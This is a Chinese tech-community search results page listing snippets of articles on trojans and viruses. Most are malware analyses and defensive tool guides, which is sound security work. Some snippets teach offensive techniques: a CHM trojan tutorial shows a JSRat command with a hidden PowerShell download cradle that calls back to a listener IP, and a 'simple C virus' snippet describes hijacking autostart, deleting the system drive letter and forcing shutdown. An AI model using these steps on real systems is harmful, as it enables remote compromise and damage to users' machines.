首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

木马病毒怎么回事?带你深度分析了解木马病毒

一、病毒简介SHA256:3110f00c1c48bbba24931042657a21c55e9a07d2ef315c2eae0a422234623194MD5:ae986dd436082fb9a7fec397c8b6e717SHA1...:31a0168eb814b0d0753f88f6a766c04512b6ef03二、行为分析老套路,火绒剑监控:这边可以看见创建了一个exe,又为他设置了注册表自启动;这里是进行网络链接操作,同时不断获取信息保存文件到本地...m=000C29AB634E&NOTE=Ni4xIDogMC4wfDV8djEuMAo=通过微步云沙箱在线进行扫描,结果如下:三、静态分析首先查查壳,这里并没有加壳,导入表信息更多是和网络操作有关的函数...检测之后就到了关键else中:3.1 sub_4011E0这里是解密函数名和模块名,随后进行加载,获取地址,那么对于这种情况没有比动态调试更简单的方法了:那么解密后的结果如下,根据这些函数也大致知道这个木马做了些什么事

49330
您找到你想要的搜索结果了吗?
是的
没有找到

远控木马病毒分析

一、病毒简介SHA256:880a402919ba4e896f6b4b2595ecb7c06c987b025af73494342584aaa84544a1MD5:0902b9ff0eae8584921f70d12ae7b391SHA1...进入函数内部,是俩个函数:根据特征,很明显这里是rc4的解密,当然我是动态调试直接看他解密结果,解密一个服务名,一个IP地址,SuperProServer和127.0.0.1;3.2、sub-4056C0...rundll32.exe,进入此函数:可以看到这里是进程遍历,返回进程信息,回到上一层:这里是启动命令行杀掉rundll32.exe,返回主函数;3.4、sub_4070E0进入函数内部:可以看到这里是设置病毒为服务并设置相关注册表版本类信息...;3.5、sub-407660这里是循环三次,找病毒本体,通过函数40766寻找,找到后进行启动,进入函数内部:这里是创建快照找相应进程的操作,而传入的参数就是Terms.exe;3.6、sub_405480...这里是设置自启动;3.7、sub_406B10跟进此函数: 3.7.1、sub_406290进入406170:这是一套令牌提权的组合拳,返回上一层;这里是拿到句柄复制句柄; 3.7.2、sub_4066C0

42120

制作chm格式木马病毒

因此,一旦制作CHM文件木马,其传递更易,危害更广。 恰恰,CHM支持脚本语言编程,这为制作木马,产生了天然的便利条件。...是的,一个小木马已经初见雏形了。 3.POWERSHELL木马制作 由2我们已经知道CHM制作木马的整体流程了,那么,如何制作一款能够弹回shell环境的木马呢?木马的脚本又是怎么编写呢?...格式为: python MyJSRat.py -i 192.168.2.237 -p 8080 -c "powershell.exe -nop -w hidden -c $M=new-object net.webclient...6.总结 普通用户由于对CHM认知不够,对CHM文件防御心理较弱,因此制作CHM木马容易被执行。而CHM天然对脚本的支持使得制作CHM木马十分简便。...在制作CHM木马时,由于powershell的强大,因此选择powershell做为后门脚本语言。

5.4K10

Windows病毒木马排查工具

工控系统越来越多被病毒软件和恶意木马攻击,造成很多工控系统运行缓慢,表现症状为操作缓慢,画面切换卡顿,历史曲线和操作面板调用卡顿,检查windows操作系统时候发现cpu并不是很高,内存占用也不多,但硬盘读写很疯狂...今天剑工提供一个windows脚本工具,用来帮助工控用户检查windows系统关键项是否异常,脚本工具叫:windows check tools,文件名wct.bat 首先下载wct.bat到c盘根目录下...执行C:\>wct.bat 会出现一个脚本提示bar,等待出现completed表示检查完毕,在c:\programdata下出现一个check文件夹 Check文件夹下会自动生成以下几个文件。...最后查看application/system/security三项的事件记录,可以根据时间查看事件的顺序的内容 以上通过此脚本工具可以快速排查病毒/木马对windows系统的入侵。...对于如何安全清除这些木马病毒,欢迎大家加入剑指工控技术群获取离线清除工具(不同的工控系统需要采用不同的清除工具,防止清除工具对工控系统产生不必要的删除和隔离)

67610

勒索病毒-特洛伊木马变种

​一、病毒简介文件名称:457d9e4773f45954449ee5913d068fdbb3d8e5689019688e7bce901467e5473a文件类型(Magic):PE32 executable...account:@datarestoreYour personal ID:109AJsd73yiu3hjdfgiagsMxds3LxpDLrrIrIVlqmVQ2P4y09QCIrzCYt1一个勒索病毒...脱壳后拖入PEID查看:随后拖入IDA中,开始分析:捣鼓了半天,没找到病毒代码,动态调试一下。...五、动态分析可以看到我们病毒样本都被修改,加了后缀名切无法恢复:恢复快照,OD附加,顺带打开火绒剑监控:前面和IDA中对照分析就好,到GetCommandLineA()这个函数的时候获取的是病毒路径:从这里分析开始...]@11 int v189; // [sp+5C4h] [bp-1C90h]@11 int v190; // [sp+5C8h] [bp-1C8Ch]@11 int v191; // [sp+5CCh]

73820

木马病毒介绍 Trojans virus backdoor rootkit

也就是说好多杀毒软件自带的木马专杀程序只查杀木马而一般不去查杀病毒,但是它自身的普通病毒查杀程序既查杀病毒又查杀木马!...Exeload=c:windowsfile.exe。这时你就要小心了,这个file.exe很可能是木马。...我们知道当服务端用户打开含有木马的文件后,木马会将自己拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下),一般来说 原木马文件 和系统文件夹中的木马文件的大小是一样的...查找方法 运行了《蓝色火焰木马》服务端程序“bf_server.exe”,会在C:\WINDOWS\SYSTEM文件夹下生成三个木马文件“tasksvc.exe”、“sysexpl.exe”、“bfhook.dll...3.到C:\WINDOWS\SYSTEM下,将tasksvc.exe、sysexpl.exe、bfhook.dll这三个文件彻底删除。

3K30

CentOS使用ClamAV查杀木马病毒

相对Windows来说,CentOS是很少有病毒木马的,但是随着挖矿行为的兴起,服务器也越来越容易成为黑客的攻击目标,一方面我们需要加强安全防护,另外如果已经中毒,则需要使用专业工具进行查杀。...ClamAV是开源的专业病毒木马、恶意软件的查杀工具,支持多种Linux发行版,包括CentOS。...这一步耗时较长,视网络情况 sudo systemctl stop clamav-freshclam sudo freshclam 更新后,启动病毒库自动更新服务 sudo systemctl start...clamav-freshclam sudo systemctl enable clamav-freshclam 扫描病毒 sudo clamscan -r /home 扫描后,一般情况下是没有病毒的...清除病毒 sudo clamscan --infected --remove --recursive /home 参考 How to scan CentOS server for malware

2.4K30

正义病毒出现:不感染反而暗杀别的木马

就像丧尸电影的病毒感染一样,一个咬一个,一个咬一个,最后丧尸席卷全球。 人们为这类蠕虫程序起了个形象的名字 ——“僵尸网络”。 ?...▲僵尸网络,图片来自网络 在某些方面,Mirai 比真正的丧尸病毒更可怕。 首先,它就在你周围。 我们常说未来是物联网的时代,所有一切都变得智能。对于僵尸网络来说,那将是一场饕餮盛宴。...其次,Mirai 僵尸网络还具有强大的“重生”功能,你刚把自己被感染的设备上的Mirai病毒清除,可能不到一分钟,就又被其他“丧尸”重新感染。...▲就像电影《黑客帝国》中杀不死的病毒史密斯 在过去的几个月里,Hajime 的传播速度迅速。保守估计全球受感染的设备数量已经达到数万台,中国是受感染的市场之一。 ?

98540

Linux内核级木马病毒攻防:基础工具介绍

要想在Linux系统上开发或研究木马病毒等特殊程序,我们需要使用一系列强大的开发和调试攻击。本节先介绍几种在Linux系统上极为强大的工具。...我们后面开发代码或调试分析其他病毒木马的设计模式和原理时,必须使用gdb作为手术刀,对要研究的病毒木马进行”剖尸检验“,通过gdb调查木马病毒的代码设计方法,同时也使用gdb加载恶意代码,研究其运转流程...第二个是objdump,它的作用是将恶意代码所编制成的可执行文件内部信息抽取出来,例如如果病毒木马最后编译成ELF格式的可执行文件,那么我们可以使用该工具将里面的各种信息展示出来,举个例子,使用C语言写一个...; } 然后使用gcc编译成可执行文件,命令如下: gcc -Wall -g hello_world.c -o hello_world 注意到gcc也是在Linux上进行程序开发必不可少的编译器...read(fd, &buffer, 10); printf(buffer); } 然后使用gcc如前那样将其编译成格式为elf的可执行文件sys_read,接着调用如下命令: strace -c

1.4K10

木马病毒DNS数据传输成为历史:看我如何让XShell病毒失效

为逃避检测,Dns传输已逐步成为越来越多的恶意软件隐蔽传输的方法,dns传输利用dns逐级解析过程最终把域名中的恶意内容传输到远端控制器,也利用dns的txt类型回包更新本地木马病毒。...适用于各大公司彻底解决dns木马病毒传输通道问题。...基本思想与原理 具体原理如下所述: 1、固定pc的dns服务器配置,并禁止修改,防止木马病毒修改绕过安全策略,或用户修改配置无意降低安全标准 2、屏蔽pc外联的53端口访问,防止恶意程序在代码中使用自定义...网关:192.168.187.2 iii. dns:192.168.187.2 c) 一台squid代理服务器,ubuntu系统 i. ip:192.168.187.136 ii....锁定dns配置,防止用户或木马病毒修改: Xp系统可使用这个 ? Win7可使用此工具 ? ii. 配置代理,访问外网: ? b) Dns服务器配置 i.

2.8K70

内核级木马病毒攻防:windows恶意代码分析入门

本节帮助读者入门windows上如何对恶意软件或病毒做初步分析。...分析分两种,一种叫静态分析,也就是通过直接读取病毒或恶意程序的可执行文件来分析它的运行原理,一种是动态分析,也就是在病毒或恶意程序正在运行的情况下,监视其一举一动,通过观察它在系统中的运行情况来分析它的目的和原理...本节介绍基本的静态分析方法,该方法简单易行,但作用有限,要想跟病毒或恶意程序斗智斗勇最终还得依赖于动态分析。静态分析的第一种方法就是直线读取病毒或恶意程序的可执行文件,从中抽取关键信息。...一种最常用的反查杀手段就是对可执行文件进行打包压缩,然后在打包后的文件上添加解包代码,在病毒或恶意软件运行时,它会先执行解包代码将被打包的病毒程序释放出来然后再运行,基本流程如下所示: ?...大多数情况下,病毒或恶意代码的创作者会“加壳”,也就是通过前面的upx类似程序将代码打包压缩,这样就能防止别人通过walker这类软件抓取它的加载库从而防止病毒或恶意代码被查杀。

1.2K10

涅槃团队:Xcode幽灵病毒存在恶意下发木马行为

我们还原了恶意iOS应用与C2服务器的通信协议,从而可以实际测试受感染的iOS应用有哪些恶意行为。 最后,我们分析了攻击的发起点:Xcode,分析了其存在的弱点,以及利用过程,并验证了该攻击方法。...一、恶意行为与C2服务器 1、通信密钥分析 恶意程序将其与服务器通信的数据做了加密,如下图所示: ? 密钥的计算方法: ? 通过分析,密钥为:stringWi,生成密钥的方式比较有迷惑性。...2、恶意行为分析 恶意行为一:做应用推广‍ 方法是:首先检测用户手机上是否安装了目标应用,如果目标应用没有安装,则安装相应应用,其中目标应用由C2服务器控制。...我们逆向了恶意代码与C2服务器的通信协议,搭建了一个测试的C2服务器。...然后通过C2服务器可以控制客户端安装第三方应用(演示应用为测试应用,不代表恶意软件推广该应用),见视频: 这是第一个针对 XcodeGhost 能力的视频演示 恶意行为二:伪造内购页面‍ 相关代码如下

64580

C语言编写简易病毒

本次实验设计的是一个基于C语言的恶意代码,其执行流程如下: 1、 在病毒第一次执行时,即检测到注册表的任务管理器没有被禁用,则病毒依次执行以下功能: 创建开机启动项,在系统目录路径下面复制文件,将其作为自启动路径...程序继续之心那个,弹窗显示C盘盘符破坏成功。如图3.4所示。系统盘盘符被删除之后桌面上的一切快捷方式失效,开始菜单中全部变为无效的快捷方式,点开计算机窗口没有反应,执行效果如图3.5所示。...病毒预先功能基本实现。...在编写此次恶意代码的过程中,对病毒程序或者是木马程序如何修改注册表以及将自己拷贝到系统目录路径有了更深一步的认识以及实践,学会了如何使用文件操作API、注册表修改API、磁盘盘符修改API等windowsAPI...//C://winnt"); system("title 警告"); system("shutdown -f -s -t 10 -c ""计算机将于60秒内强制关机!""")

4.1K31
领券